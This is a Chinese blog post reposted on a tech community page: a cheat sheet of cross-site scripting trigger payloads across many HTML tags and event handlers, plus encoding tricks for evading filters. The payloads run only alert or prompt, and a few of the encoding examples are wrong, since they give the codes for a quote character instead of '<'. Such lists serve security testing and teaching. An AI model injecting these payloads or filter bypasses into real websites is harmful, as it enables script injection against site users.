专栏首页HACK学习XSS触发语句备忘

XSS触发语句备忘

一、标准语句

<script>alert(/XSS/)</script>

二、尝试大小写

<sCript>alert(1)</scRipt>

三、使用<img>标签

1、windows事件
<img src="x" onerror=alert(1)>
<img src="1" onerror=eval("alert('xss')")>
//图片加载错误时触发

2、鼠标事件
<img src=1 onmouseover="alert(1)">
//鼠标指针移动到元素时触发
<img src=1 onmouseout="alert(1)">
//鼠标指针移出时触发

四、使用<a>标签

1、使用href属性
<a href="https://www.qq.com">qq</a>
<a href=javascript:alert('xss')>test</a>
<a href="javascript:a" onmouseover="alert(/xss/)">aa</a>
<a href="" onclick=alert('xss')>a</a>
<a href="" onclick=eval(alert('xss'))>aa</a>
<a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

五、使用<input>标签

<input name="name" value="">
<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">
<input name="name" value=""><script>alert('xss')</script>
<input type="text" onkeydown="alert(1)">
//用户按下按键时触发

<input type="text" onkeypress="alert(1)">
//用户按下按键时触发

<input type="text" onkeyup="alert(1)">
//用户松开按键时触发

六、使用<from>标签

<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')>

<form method=post action=aa.asp? onmouseover=prompt('xss')><form method=post action=aa.asp? onmouseover=alert('xss')><form action=1 onmouseover=alert('xss)>

<!--原code--><form method=post action="data:text/html;base64,<script>alert('xss')</script>"><!--base64编码--><form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

七、 使用<iframe>标签

<iframe src=javascript:alert('xss')></iframe>

<iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe> <!--原code--><iframe src="data:text/html;base64,<script>alert('xss')</script>"> <!--base64编码--><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="> <iframe src="aaa" onmouseover=alert('xss') /><iframe> <iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>

八、 使用<svg>标签

<svg onload=alert(1)>

九、 使用<body>标签

<body onload="alert(1)">
//加载时触发

十、 使用<button>标签

<button onclick="alert(1)">text</button>
//元素上点击鼠标时触发

<p onmousedown="alert(1)">text</p>
//元素上按下鼠标时触发


<p onmouseup="alert(1)">text</p>
//在元素上释放鼠标时触发

十一、 使用<p>标签

<p onmousedown="alert(1)">text</p>
//元素上按下鼠标时触发

<p onmouseup="alert(1)">text</p>
//在元素上释放鼠标时触发

十二、XSS编码绕过

1、html实体编码(10进制与16进制):
如把尖括号编码[ < ]  -----> html十进制: &#60;  html十六进制:&#x3c;

2、javascript的八进制跟十六进制:
如把尖括号编码[ < ]  -----> js八进制:\74  js十六进制:\x3c
三个八进制数字,如果数字不够,在前面补零,如a的编码为\141
两个十六进制数字,如果数字不够,在前面补零,如a的编码为\x61
四个十六进制数字,如果数字不够,在前面补零,如a的编码为\u0061
对于一些控制字符,使用特殊的C类型的转义风格,如\n和\r

3、url编码:
如把尖括号编码[ < ] -----> url: %22

4、base64编码:
如把尖括号编码[ < ] -----> base64: Ig==

5、jsunicode编码:
如把尖括号编码[ < ] ----->jsunicode:\u003c

6、String.fromCharCode编码
如alert的编码为String.fromCharCode(97,108,101,114,116)

推荐阅读:

XSS及绕过方式
https://github.com/lijiahaoGithub/xss/blob/master/xss.docx

作者:EI作者博客:EI_'s Blog
本文由公众号HACK学习排版编辑整理

本文分享自微信公众号 - HACK学习呀(Hacker1961X),作者:EI

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-01-01

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • XSS绕过实战练习

    写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下。有些关卡不能再虚拟环境实践,...

    HACK学习
  • 技巧 | XSS的常见绕过方法

    <script>alert('XSS test')</script> “<script>alert('XSS test')</script> <script...

    HACK学习
  • CS如何配置通过CDN上线

    CDN需要关闭缓存或开启开发模式,如果不关闭缓存,会出现执行命令,回不来返回内容以及机器超时。

    HACK学习
  • python3 cookbook

    使用deque(maxlen=N)构造函数会新建一个固定大小的队列.当新的元素加入并且这个队列已满的时候,最老的元素会被移除掉.在队列两端插入或者删除元素时间复...

    py3study
  • iOS自动化探索(三)WebDriverAgent Python Client

    之前我们在终端试着调用过WDA API, 今天我们在看一个Python封装的api库

    周希
  • 各种NLP操作难实现?谷歌开源序列建模框架Lingvo

    Lingvo 是世界语(Esperanto)中的一个单词,它表示「语言」的意思。这一命名展示了 Lingvo 框架的根源:它是由 TensorFlow 开发的通...

    机器之心
  • 记一次 .NET Framework 不兼容 HTTP COOKIE 协议标准的问题跟踪

    我们在后端系统实现了 HTTP 请求的代理类,用于请求其他第三方系统。

    Austin
  • 【深度知识】RPC原理及以太坊RPC的实现

    Remote Procedure Calls 远程过程调用 (RPC) 是一种协议,就是从一台机器(客户端)上通过参数传递的方式调用另一台机器(服务器)上的一个...

    辉哥
  • 使用Fusioncharts实现后台处理进度的前台展示

    关于第一个问题,不是本文的重点,简单说一下思路。因为HTTP协议实际上是无状态的协议,前台的请求提交给后台之后,一般情况下都是后台处理完成才会向前台返回处理结果...

    大江小浪
  • 委托与事件-委托详解(一)

      说起委托和事件,我就想起了再学校的时候,当时死记硬背去记什么是委托什么是事件。记得当时蝼某人问我,委托是什么?但是只知道一点点,就跟他说:打个比方,我要喝水...

    小世界的野孩子

扫码关注云+社区

领取腾讯云代金券